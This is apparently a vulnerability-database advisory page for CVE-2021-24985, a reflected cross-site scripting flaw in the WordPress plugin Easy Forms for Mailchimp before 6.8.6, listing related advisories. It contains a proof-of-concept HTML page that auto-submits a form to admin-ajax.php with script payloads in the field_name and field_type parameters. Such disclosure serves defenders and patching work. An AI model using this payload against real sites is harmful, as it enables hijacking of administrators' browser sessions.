Lucene search
JrXnmWPEX-ID:50BE0EBF-FE6D-41E5-8AF9-0D74F33AEB57HistoryDec 21, 2021 - 12:00 a.m.
Easy Forms for Mailchimp < 6.8.6 - Reflected Cross-Site Scripting
2021-12-2100:00:00
JrXnm
68
0.001 Low
EPSS
Percentile
30.1%
The plugin does not sanitise and escape the field_name and field_type parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST">
<input type="hidden" name="action" value="add_field_to_form" />
<input type="hidden" name="field_name" value='xxxxxxxxxxxx"><script>alert(/XSS-field_name/)</script>' />
<input type="hidden" name="field_type" value='"><script>alert(/XSS-field_type/)</script>' />
<input type="hidden" name="list_id" value="../../../../../" />
<input type="submit" value="Submit request" />
</form>
</body>
<script>
var form1 = document.getElementById('hack');
form1.submit();
</script>
</html>
Related
wpvulndb
wpvulndb
Easy Forms for Mailchimp < 6.8.6 - Reflected Cross-Site Scripting
2021-12-21 00:00:00
cve
cve
CVE-2021-24985
2022-01-24 08:15:09
osv
osv
CVE-2021-24985
2022-01-24 08:15:09
prion
prion
Cross site scripting
2022-01-24 08:15:00
openvas
openvas
WordPress Easy Forms for Mailchimp Plugin < 6.8.6 XSS Vulnerability
2022-01-26 00:00:00
cvelist
cvelist
nvd
nvd
CVE-2021-24985
2022-01-24 08:15:09
patchstack
patchstack
cnvd
cnvd
WordPress Easy Forms for Mailchimp plugin cross-site scripting vulnerability
2022-01-26 00:00:00